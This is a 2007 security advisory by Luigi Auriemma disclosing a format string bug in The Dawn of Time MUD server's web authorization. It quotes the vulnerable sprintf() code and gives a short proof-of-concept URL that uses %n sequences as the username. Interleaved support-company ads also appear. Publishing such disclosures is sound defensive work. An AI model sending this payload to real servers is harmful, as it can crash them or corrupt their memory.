Format string in The Dawn of Time 1.69s beta4

#######################################################################

                             Luigi Auriemma

Application:  The Dawn of Time
              
http://www.dawnoftime.org
Versions:     <= 1.69s beta4 (and 1.69r too)
Platforms:    *nix and Windows
Bug:          format string in web server authorization
Exploitation: remote
Date:         05 Oct 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################



1) Introduction
2) Bug

#######################################################################

1. Introduction

   ---

The Dawn of Time (aka Dawn) is a MUD server originally based on the ROM codebase.

#######################################################################

A format string vulnerability is located in the function which handles the access to the restricted zones of the internal web server like "Reset password".
After having decoded the base64 string containing username:password the string is used without format argument with sprintf().

from websrv.cpp:

bool processWebHeader(web_request_data *w){

                ...
                if (str_len(pLine)>0 && str_len(pLine)<200){
                    char decoded[200];
                    char *d;

                    d =decodeBase64(pLine);
                    if (d){
                        sprintf(decoded,d);
                        ...
void filterWebRequest(connection_data *c){
                    ...
                    if (str_len(pLine)>0 && str_len(pLine)<200){
                        char decoded[200];
                        char *d;

                        d =decodeBase64(pLine);
                        if (d){
                            sprintf(decoded,d);

#######################################################################

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Go to:

  http://SERVER:4001/locked

and use the username %n%n%n%n%n
or just:

  http://%n%n%n%n%n:%n%n%n%n%n@SERVER:4001/locked

#######################################################################

The bug will be officially fixed in the next release. I have also opened a thread in the Dawn forum some days ago with the instructions for the fix:

  http://forums.dawnoftime.org/viewtopic.php?t=2102

#######################################################################

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

---
Luigi Auriemma

http://aluigi.orghttp://forum.aluigi.orghttp://mirror.aluigi.org